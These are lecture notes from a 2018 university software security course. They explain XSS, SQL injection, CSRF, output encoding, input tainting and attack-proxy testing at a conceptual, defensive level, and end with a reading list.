Part 1: Bugs are functionality, too
- Let’s take a very abstract view of a system, or a component within a system:
All intended functionality brings in unintended functionality
- The ”intended functionality” in the picture is what the software is supposed to do, feature-wise. This intended functionality takes in intended inputs, and produces an intended effect.
- Because of design flaws, implementation bugs, and side effects that are result of unintended interactions with the environment, almost all (or probably all) non-trivial real-world systems exhibit ”unintended functionality”.
- Bugs are functionality too. Another way at looking this is that hacking systems doesn’t ”break” them – it just uses them in ways that were unintended by their original authors.
- Viewing the system from this perspective, there are several takeaways of what you can do. These are discussed in more detail in Part 3, below:
- Removing unnecessary functionality. As the unintended functionality is created as a side effect of intended functionality, removal of intended functionality will also remove some unintended functionality. However, you cannot tell specifically how much and which unintended functionality is being removed; but the general consensus is that by removing features, you usually make the system more resilient. This is also true because it is easier to analyse.
- Restricting the input languages. Language-theoretic security ”posits that the only path to trustworthy software […] is treating all valid or expected inputs as a formal language, and the respective input-handling routines as a recognizer for that language. The recognition must be feasible, and the recognizer must match the language in required computation power.”
- The ”feasibility” is about restricting the expressiveness of the language. If your input does not need to be a computer program, why does it need to be Turing-complete language? (Grammars can be ordered in a Chomsky hierarchy).
- One real-world option is to split the expressive language parsing into a (sandboxed) front-end, that is as small as possible and restricted in what it can do, and that outputs a simplified, less expressive output, that is then the input for the main processing step.
A “front-end” with a small codebase creates sanitised input
- Dropping invalid input. If the inputs are not treated as a formal language with an acceptor (recognizer), as is the typical real-world case where parsers are just hacked together, then invalid inputs often end up being processed. The often-quoted engineering practice of ”being liberal in what you accept, and conservative in what you send” may cause security issues because liberal acceptance often means that we have to interpret badly defined inputs. Security-wise, it is usually better to be conservative. Dropping invalid input as early as possible is usually a good strategy.
- Tainting. In real-world systems, we often process data flows whose origin is unknown, untrusted, or obscure. A strategy that can be pursued both in secure coding and by various tools is ”tainting” these untrusted data flows, and only using them after they have been ”untainted”. This strategy will be discussed later in more detail.
- The concept of tainting is also used in human systems; for example, when a criminal investigation (in the U.S. at least) needs to look at documents that may be under an attorney-client privilege, a separate “taint team” looks at them first, and the investigators only look at the untainted documents.
- Context-specific output encoding. Systems output data to other systems. Depending on where the data is being output, it may need to be escaped or encoded. The only place where we really know the required encoding is at the output – we cannot guess where the data ends up later during its lifetime. Doing this elsewhere may lead to double-encoding or missing encoding (the latter of which can be a security issue).
Different output contexts require different encoding
Part 2: Privilege elevation on the web
- Recap of session 1: Data is being run as code in the process context. In the demo and exercises last week, we were working in an environment where the lowest-level execution environment - the processor itself - is tricked into executing attacker’s code.
- The same idea can be pulled off on higher level languages. In these situations, it is typically an interpreter which is tricked into executing code that has been INJECTED into the original program. The details vary by language and environment.
- Since the advent of the World Wide Web, so-called ”web applications” have become an extremely widely deployed set of programs. Originally, most of the logic was on the server end, and static web pages written in HTML were passed back and forth.
Discussion: Which execution environments or languages exist in the web application space? Where are they executed? Where does the code that they execute, come from?
- SQL is also a real programming language in its own right.
- Some ways of getting attacker’s code to run in a web application context. We will look at two: Cross-Site Scripting and SQL injection as examples.
- Cross-Site Scripting (XSS)
- Browsers’ security model is Same-Origin Policy. The “origin” is a triplet of the URI scheme, domain, and port.
- Scripts from a specific origin can only access and manipulate data, and connect to, resources from the same origin.
- An XSS attack means that the attacker can inject code into a document which the browser thinks came from that specific origin, and thus can get access to something the attacker shouldn’t be able to access.
Simple reflected XSS
- In this regard, this is a PRIVILEGE ESCALATION attack, where privileges are given by the script origin. (Some might think this kind of shoehorns the attack into this class of issues, but I don’t think it’s that far fetched.)
- XSS attacks come in two major flavours:
- A reflected XSS attack sends the attack code in a request, and gets it back in a response. Because the code now “came” from the specific origin, it has elevated its privileges to act as if it really was intended to come from the server.
- A stored XSS attack is like a reflected attack, but the attack code gets somehow stored in a database or some other place, and it gets played back without it being in the currently processed request.
- What an attacker can typically do with an XSS attack?
- Manipulate the web page, and access anything the user types on the web page.
- Steal cookies.
- There are new web technologies such as Cross-Document Messaging and Cross-Origin Resource Sharing (CORS), which have an effect on the same-origin policy, and the Content Security Policy, which can be used for effective mitigation of XSS. We will not go into these in detail, but just to let you know that if you want to stay relevant in modern web application security, you need to read up on those.
- Cross-Site Scripting (XSS)
Discuss: What aspects of the system model of Part 1 contribute to the existence of the XSS problem?
- SQL injection
- SQL is still the most prevalent back-end database query language. The rise of so-called NoSQL databases has eroded the popularity a bit. However, similar injection ideas also work for many NoSQL databases. Cassandra’s CQL even looks like SQL.
- A very typical SQL injection happens when attacker-supplied query terms are directly concatenated into an SQL query. They get executed as a part of the SQL query under the database user’s (application’s) privileges, and in this way this can also be construed as a privilege escalation.
- What can an attacker typically do with an SQL injection:
- Add, copy, or delete data.
- Dump contents (many of the ’data breaches’ reported in the press have an SQL injection at their core).
- New SQL users could perhaps be created, if the permissions are right.
- If the SQL server (and the user on which the injection code is executed) provides some more esoteric services, such as access to the underlying OS environment, those might get used.
Discuss: What aspects of the system model of Part 1 contribute to the existence of SQL injections?
Part 3: Output encoding and tainting as defensive principles
- There are various strategies in which these injection attacks can be mitigated:
- Input validation and whitelisting - strip attack code when received;
- Prepared statements and parameterised queries for SQL, where there is a static SQL template, which is populated by attacker-controlled query parameters (but because the template is static, they cannot affect the statement);
- Output encoding.
- Input validation is very hard to do right. Examples where it goes wrong:
- Encodings that the filter author forgets;
- incomplete or bad regular expressions that do not catch everything;
- if your valid input is essentially code, you would have to figure out what the code does;
- broken libraries you depend on for (un)serialising / (un)marshalling;
- false positives and too strict filters - the O’Donnells and Vähä-Sipiläs of the world always have fun,
- and of course, input languages that cannot be validated because they’re too expressive, so you can’t write a proper parser (recogniser).
- What would be the (academically speaking) correct way to do input validation?
- A state machine that is driven by specifc inputs, with clearly defined state transitions that are caused by each symbol that is read.
- This requires a formal grammar specification for the input. The challenge is that many real-life inputs are not easy to parse. For example, validating input where validation depends on something that was in the input previously (context-sensitive) potentially causes pretty hard validation challenges. Also most real-life specifications are not formal enough to be without interpretation issues.
- Prepared statements are query language, and often database specific.
Example: INSERT INTO foo (?, ?, ?) values ($quux, $bar, $bletch)
- Output encoding in practice:
- The idea is that attacker injection only works if the injected data is interpreted as code (i.e., directing execution) in the output context.
- Usually every output context has escaping rules where characters that would otherwise have special meaning will be transformed into something that only represents the character.
- Input validation does not replace the need to do proper output encoding.
- When doing input validation, you do not yet know in which contexts the data is going to be output in the future.
- In output validation, the developer knows exactly where the untrusted data is (immediately) being used, so specific escaping or encoding can be applied.
- There is less probability for data corruption due to poorly implemented, pre-emptive escaping or filtering.
- What sort of attacks does output encoding not help?
- Those cases where the attacker wants to control the validation logic itself. Bad data could cause something to be evaluated incorrectly, thus passing a validity check. (E.g., bypass digital signature check through malformed input - particularly pressing issue when the input is complex and open to interpretation.)
- Input TAINTING is a method that can be used to track untrusted input through the system.
- Untrusted (i.e., potential attacker) input is marked as ”tainted”, and the system ensures that tainted data cannot be output in any sensitive output context before being untainted (i.e., escaped or encoded).
- Some frameworks offer good support for this, e.g., Django (a Python web framework). Perl even has a taint option for running programs.
- To summarise, some design and implementation paradigms for inputs:
- Aim as simple inputs as possible, and implement parsers for them using a parser generator (look at Bison and Yacc).
- Perform complex parsing in a restricted environment, like a sandbox, if you can.
- Avoid too expressive languages to convey data, if simple ones suffice. (Example: If all you need to provide can be expressed in a CSV, why use an Excel sheet?)
- Never try to guess what the input meant. Strict input validation and silent discard are often good alternatives, although compatibility issues may be in conflict with this principle.
- Always understand the output context and perform output encoding when you know the output context. Do not perform encoding/escaping until you know the output context, to avoid double encoding.
Part 4: Web session attacks
- There’s a large category of problems that are related to confused state machines that plague web applications.
- HTTP itself is stateless, but web applications are stateful.
- In order to tie separate web page requests together, the server must have some information about the client. Usually this is done through creating a session, identified by a session identifier, and the client provides this session identifier to the server in every request.
- This is often implemented as a session cookie, which, as we remember, is sent automatically every time a request is made to that domain.
- This opens up various ways of attacking the user’s session.
- Cross-Site Request Forgery (CSRF, pronounced ”cee-surf”)
- Another web site directs a browser to target site;
- The browser happens to be ”in session” (e.g., logged in) to the target site;
- The target site believes that this was an authentic user-initiated request and processes it.
- Mitigating these risks is a pain if you need to do this manually. Modern, good web frameworks provide protection against this type of issues (as well as good session control) out of the box.
- Therefore, it is important to keep these issues in mind when doing technology selection for web application development.
Part 5: Web security testing with attack proxies
Note: The weekly exercise involves the use of attack proxies. We will do a high-level introduction to them during the lecture to get you up to speed.
- Typical exploratory web security testing utilises an attack proxy (a man-in-the-middle proxy).
- An attack proxy sits between the client and the server, and allows the tester to modify server requests and responses.
- OWASP has a tool called Zaproxy (Zed Attack Proxy); there is a commercial tool with a lot of market share called the Burp Suite Professional.
Demo: We show both Burp Suite and Zap in practice, how they look like, and what concepts you need to understand about them.
This is a list of useful documents that will enhance your understanding of the course material. The reading list is session-by-session. “Primary” material means something you would be expected to read if you are serious about the course, and may help you to do the weekly exercise; “Additional” material you may want to read if you would like to deepen your understanding on a specific area.
- The sqlmap SQL injection discovery tool is a powerful thing. Have a look at its feature list.
- Have a look at Django security documentation. Of special note, read the section on XSS and think about how the “safe strings” concept relates to tainted data and output encoding. Also read the section on CSRF and try to comprehend how the CSRF protection works in Django. It doesn’t matter if you don’t have previous Python or Django exposure; the overall idea should be clear.
- Programs with exploitable bugs can be viewed as weird machines that are programmed with exploits; for example, a ROP attack could be seen as a language that specifies an execution flow for a machine that is the vulnerable program. If you’re interested, see Bratus et al.: Exploit Programming: From Buffer Overflows to “Weird Machines” and Theory of Computation and Bratus, et al.: Beyond Planted Bugs in “Trusting Trust”: The Input-Processing Frontier in IEEE Security & Privacy, January 2014.
- For the course targets, the weekly exercise will get you the exposure to the attack proxies. The Burp Suite documentation is fairly good, so I recommend reading http://portswigger.net/burp/help/suite_usingburp.html#vulns and get a feel of how a web application security assessment would run (even if you would choose to use Zaproxy for the weekly exercise).
- If you are truly interested in delving deeper in specifically web application security:
- Stuttard and Pinto: The Web Application Hacker’s Handbook, 2nd Edition. This is a thick one, and definitely not needed for the course. But if you want to go forward in web application security testing, this one methodically gives you a (long!) checklist of things you need to explore. Written by the author of the Burp Suite, it goes well with that specific tool. Unlike many “hacking” books out there, the book approaches web security testing as a methodical and sometimes boring exercise (which is what it is). It is getting a bit dated, so it doesn’t cover the newest web technologies. I hope the authors will update the book at some point.
- Zalewski: The Tangled Web. This book is a seemingly neverending list of design and implementation failures in web browsers and technologies. It makes an entertaining reading if you have any background in web application implementation or standardisation, and opens your eyes to all the crud that there is in this space. Also this book is getting a bit dated - it does not diminish the humor value, though. By the way, the author of this book is also the author of the AFL fuzzer which we used in the previous assignment.
This is lecture support material for the course on Software Security held at Aalto University, Spring 2018. It is not intended as standalone study material.